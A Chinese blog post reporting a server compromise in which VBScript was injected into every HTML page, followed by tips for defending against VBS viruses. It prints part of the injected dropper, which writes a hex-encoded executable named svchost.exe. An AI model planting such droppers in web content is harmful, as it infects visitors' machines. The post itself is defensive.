https://blog.csdn.net/persistencegoing/article/details/84376427

大早上，發現伺服器被人攻擊了，所有的 html 都被植入了一段 vbscript

<!DOCTYPE html>

<html>

        <head>

                <title>這是網頁標題</title>

        </head>

</html><SCRIPT Language=VBScript><!--

DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010

這是部分程式碼

vbs病毒是使用VBScript編寫的，因為編寫簡單，經常被用到。那麼，怎樣防範vbs指令碼病毒呢？一起了解下吧。

1)禁用檔案系統物件FileSystemObject

方法：用regsvr32scrrun.dll/u這條命令就可以禁止檔案系統物件。其中regsvr32是Windows\System下的可執行檔案。或者直接查詢scrrun.dll檔案刪除或者改名。

還有一種方法就是在登錄檔中HKEY_CLASSES_ROOT\CLSID\下找到一個主鍵{0D43FE01-F093-11CF-8940-00A0C9054228}的項，咔嚓即可。

2)解除安裝WindowsScriptingHost

在Windows98中(NT4.0以上同理)，開啟[控制面板]→[新增/刪除程式]→[Windows安裝程式]→[附件]，取消“WindowsScriptingHost”一項。

和上面的方法一樣，在登錄檔中HKEY_CLASSES_ROOT\CLSID\下找到一個主鍵{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的項，咔嚓。

3)刪除VBS、VBE、JS、JSE檔案字尾名與應用程式的對映

點選[我的電腦]→[檢視]→[資料夾選項]→[檔案型別]，然後刪除VBS、VBE、JS、JSE檔案字尾名與應用程式的對映。

4)在Windows目錄中，找到WScript.exe，更改名稱或者刪除

如果你覺得以後有機會用到的話，最好更改名稱好了，當然以後也可以重新裝上。

5)要徹底防治VBS網路蠕蟲病毒，還需設定一下你的瀏覽器

我們首先開啟瀏覽器，單擊選單欄裡“Internet選項”安全選項卡里的[自定義級別]按鈕。把“ActiveX控制元件及外掛”的一切設為禁用，這樣就不怕了。呵呵，譬如新歡樂時光的那個ActiveX元件如果不能執行，網路傳播這項功能就玩完了。

6)禁止OE的自動收發郵件功能

7)由於蠕蟲病毒大多利用副檔名作文章，所以要防範它就不要隱藏系統中已知檔案型別的副檔名

Windows預設的是“隱藏已知檔案型別的副檔名稱”，將其修改為顯示所有檔案型別的副檔名稱。

8)將系統的網路連線的安全級別設定至少為“中等”

它可以在一定程度上預防某些有害的Java程式或者某些ActiveX元件對計算機的侵害。

最後友情提醒，預防vbs指令碼病毒，防毒軟體確實很必要，儘管有些防毒軟體挺讓廣大使用者失望，不過，選擇是雙方的哦。在這個病毒橫飛的網路，如果您的機器沒有裝上防毒軟體我覺得確實挺不可思議的。

希望大家關注我一波,防止以後迷路,有需要的可以加群討論互相學習java ,學習路線探討,經驗分享與java求職      群號:721515304